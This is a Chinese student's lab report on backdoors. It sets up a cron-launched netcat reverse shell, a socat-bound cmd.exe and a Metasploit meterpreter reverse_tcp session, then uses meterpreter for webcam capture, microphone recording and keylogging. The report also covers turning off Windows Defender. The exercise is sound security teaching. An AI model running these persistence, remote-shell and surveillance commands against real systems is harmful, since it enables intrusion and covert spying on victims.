20165309 《网络对抗技术》实验二：后门原理与实践

• 1.基础问题回答
  • (1)例举你能想到的一个后门进入到你系统中的可能方式？
  • (2)例举你知道的后门如何启动起来(win及linux)的方式？
  • (3)Meterpreter有哪些给你映像深刻的功能？
  • (4)如何发现自己有系统有没有被安装后门？
• 2.实验总结与体会
  • (1)遇到的问题与解决
  • (2)实验感受
• 3.实践过程记录
  • (0)准备工作
  • (1)使用netcat获取主机操作Shell，cron启动
  • (2)使用socat获取主机操作Shell, 任务计划启动
  • (3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
  • (4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

• 在非官网上下载破解版软件或打开不请自来的邮件的时候，后门悄然而至，易使工作站和桌面系统被蓄意利用。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

• win：点击钓鱼链接；修改注册表，增加后门自启动代码。
• linux：实验中的cron启动。

(3)Meterpreter有哪些给你映像深刻的功能？

• 拍照、录像、录音、获取击键记录、截屏......就是这些让人失去隐私的功能

(4)如何发现自己系统有没有被安装后门？

• 使用查杀软件；
• 留意不明端口和未知进程。

返回目录

2.实验总结与体会

(1)遇到的问题与解决

• 问题一：运行可执行文件时在已关防火墙的状态下被Windows当成木马拦截：拒绝访问。
  

• 解决一：除了控制面板里关掉防火墙，win10里内置的Windows Defender也要关闭，当时没有发现还有这个...如果依然拒绝访问的话，可以添加排除项...在多次尝试失败后，还可以右键可执行文件->属性->安全->编辑权限。重新生成和传送后就可以运行了~
  
  
  

• 问题二：报错Cannot allocate memory。
  

• 解决二：这个报错的直译是：无法分配内存。我想到了是因为内存不足，所以设置虚拟机的内存为4G（要分配的比原先大），解决问题。

(2)实验感受

跟着老师的实验指导和学姐学长们的经验博客，完成本次实验其实很容易。这次实验帮助我掌握了后门的原理，也让我在一次次利用后门的攻击中有了更直观的感受（可能还有一丝丝成功攻击了自己主机的兴奋...？？）。今后一定要增强安全防范意识，定期查杀，以免自己的隐私和电脑控制权落入他人之手。

返回目录

3.实践过程记录

(0)准备工作

• 查看本机IP地址（我在实验过程中连了3处地方的Wifi，所以换了3组IP，给自己增加了麻烦...劝告大家要使用固定的网络）：
  • Windows下：ipconfig
  • Linux下：ifconfig -a（显示全部接口信息）
• 常用后门工具——NC
  • 基本步骤是：打开监听->反弹连接->获取shell（具体指令可见下方截屏）
    • Win获得Linux Shell
      
    • Linux获得Win Shell
      
    • nc传输数据
      

(1)使用netcat获取主机操作Shell，cron启动

注：此时Win是攻击方，Linux是受害方

• 在Win里用ncat.exe -l -p 5309监听5309端口

• 在Linux环境下，用crontab -e指令编辑定时任务，选择基本的vim编辑器（"3"）
  

• vim编辑器中，在最后一行插入08 * * * * /bin/netcat 10.43.34.219 5309 -e /bin/sh（这里的IP地址为Win攻击机的IP）并 :wq!保存退出。
• 上述指令表示在每个小时的第8分钟反向连接Win主机的5309端口。设置规则我们可以学习：Linux定时任务Crontab命令详解。
  

• 在8分之前，Win里输入指令，屏幕上没有反应，当8分时，Win就获得了Linux的shell，指令的内容则显示了出来：
  

(2)使用socat获取主机操作Shell, 任务计划启动

注：此时Win是受害方，Linux是攻击方

• 在Win的计算机管理中创建任务并新建触发器，在操作的程序或脚本中添加上socat.exe的路径，在参数栏中填写tcp-listen:5309 exec:cmd.exe,pty,stderr，把cmd.exe绑定到端口5309，同时将stderr重定向到stdout上：
  
• 按快捷键win+L锁定计算机，创建的任务就开始运行了。
  
• 此时在Linux中输入指令socat - tcp:172.30.1.13:5309 ，发现成功获得了Win的cmd shell：
  

(3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

注：此时Win是受害方，Linux是攻击方

• Linux中生成后门程序（命令见下图）
• 使用ncat传输已生成的后门程序文件：
  • Win中监听并保存后门程序
  • Linux再向Win传输后门程序
    
    

• Linux里打开一个终端，使用msfconsole指令进入msf控制台。
• 接着输入use exploit/multi/handler使用监听模块，设置payload。
  
• 用set payload windows/meterpreter/reverse_tcp使用和生成后门程序时相同的payload，然后设置IP和端口号：
  
• Linux执行监听，Win运行后门，于是Linux获得了Win主机的连接，并且得到了远程控制的shell：
  
  

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

注：需重复上一环节操作至exploit，此时Win是受害方，Linux是攻击方

• 使用webcam_snap获取目标主机摄像头：
  
• 使用screenshot获取目标主机的截屏：
  
• 使用record_mic指令可以截获一段音频
  
• 使用getuid查看当前目标主机用户：
  
• 使用keyscan_start记录击键的过程，使用keyscan_dump读取击键记录：
  

返回目录